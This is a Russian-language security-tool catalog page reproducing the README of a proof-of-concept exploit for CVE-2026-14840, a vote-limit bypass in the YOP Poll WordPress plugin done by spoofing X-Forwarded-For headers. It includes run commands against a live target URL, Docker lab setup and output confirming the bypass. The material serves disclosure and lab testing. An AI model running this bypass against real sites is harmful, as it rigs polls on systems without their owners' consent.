Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14840 — Эксплойт proof-of-concept для обхода лимита голосования в плагине WordPress через подделку заголовков X-Forwarded-For; поставляется с Docker-лабораторией для проверки CVE-2026-14840 на авторизованных инстансах WordPress. | Kitploit
Инструменты/GitHubGitHub/nullwhisper/cve-2026-14840
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеЛаборатории и Практика
GitHubnullwhisper/cve-2026-14840

CVE-2026-14840

Эксплойт proof-of-concept для обхода лимита голосования в плагине WordPress через подделку заголовков X-Forwarded-For; поставляется с Docker-лабораторией для проверки CVE-2026-14840 на авторизованных инстансах WordPress.

Репозиторий
41 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-14840 — Обход лимита голосов в YOP Poll < 7.0.6

Автор: nullwhisper
Назначение: только авторизованные исследования безопасности / проверка уязвимостей.

Что это?

Версии плагина YOP Poll < 7.0.6 применяют ограничение «один голос с одного IP». Проблема в том, что для получения IP клиента он проверяет HTTP_CLIENT_IP и HTTP_X_FORWARDED_FOR раньше, чем REMOTE_ADDR. Оба заголовка контролируются атакующим, поэтому неаутентифицированный пользователь может подделывать новый IP в каждом запросе и голосовать неограниченное количество раз.

  • CVE: CVE-2026-14840
  • Продукт: плагин YOP Poll для WordPress
  • Уязвимые версии: < 7.0.6
  • Исправлено в: 7.0.6
  • Тип: обход контроля доступа
  • CVSS: 5.3

Ссылки

  • WPScan: https://wpscan.com/vulnerability/fc810ca2-3f27-414d-b94a-68842925b7c6/
  • Запись CVE: https://www.cve.org/CVERecord?id=CVE-2026-14840
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14840

Файлы

.
├── cve_2026_14840_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a poll + public test page
├── requirements.txt
└── README.md

Установка

pip3 install -r requirements.txt

Использование

Живая цель

python3 cve_2026_14840_poc.py -u https://target.com/page-with-poll -n 10

-n — количество отдаваемых голосов. Если будет принято более одного, цель уязвима.

Скрипт автоматически переключается на ?rest_route=/yop-poll/v1/votes, если сайт использует обычные постоянные ссылки WordPress (plain permalinks), а /wp-json/... возвращает HTML.

Локальный стенд

  1. Скачайте уязвимый плагин (не распространяйте сам дистрибутив плагина):

    mkdir -p lab/yop-poll
    cd lab/yop-poll
    wget https://downloads.wordpress.org/plugin/yop-poll.7.0.5.zip
    unzip yop-poll.7.0.5.zip && rm yop-poll.7.0.5.zip
    cd ../..
    
  2. Запустите стенд:

    cd lab
    docker compose up -d
    
  3. Завершите установку WordPress по адресу http://127.0.0.1:8090.

  4. Создайте опрос и тестовую страницу:

    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Запустите PoC:

    python3 cve_2026_14840_poc.py -u 'http://127.0.0.1:8090/?page_id=4' -n 5
    

Проверено на localhost

Протестировано на WordPress 6.8 + YOP Poll 7.0.5 со стандартными постоянными ссылками (plain permalinks).

Один и тот же IP три раза — ограничение работает:

#1 201 -> Vote recorded successfully.
#2 403 -> You have already voted on this poll.
#3 403 -> You have already voted on this poll.

Разный IP в каждом запросе через X-Forwarded-For — обход работает:

#1 201 -> Vote recorded successfully.
#2 201 -> Vote recorded successfully.
#3 201 -> Vote recorded successfully.

Таблица wp_yoppoll_votes растёт на одну строку при каждом подделанном IP, что подтверждает обход лимита по IP.

Почему плагин не включён в репозиторий

В этом репозитории находятся только PoC и файлы оркестрации стенда. Плагин YOP Poll распространяется под лицензией GPL-2.0+, но распространять его полную копию не обязательно: это раздувает репозиторий и может вызвать проблемы. Скачайте версию 7.0.5 с WordPress.org для своего стенда.

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследований. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим кодом.

Скачать инструмент